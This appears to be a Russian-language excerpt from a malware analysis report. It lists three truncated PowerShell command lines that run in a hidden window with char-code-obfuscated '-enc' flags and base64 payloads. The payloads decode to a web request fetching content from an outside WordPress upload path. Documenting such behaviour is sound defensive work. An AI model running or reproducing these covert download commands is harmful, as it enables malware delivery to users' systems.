Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C "powershell ([char]45+[char]101+[char]110+[char]99) aQBuAHYAbwBrAGUALQB3AGUAYgByAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBiAG8AbQBlAC4AbwByAGcALwB3AG8AcgBkA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C "powershell ([char]45+[char]101+[char]110+[char]99) aQBuAHYAbwBrAGUALQB3AGUAYgByAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBiAG8AbQBlAC4AbwByAGcALwB3AG8AcgBkA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc aQBuAHYAbwBrAGUALQB3AGUAYgByAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBiAG8AbQBlAC4AbwByAGcALwB3AG8AcgBkAHAAcgBlAHMAcwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABv...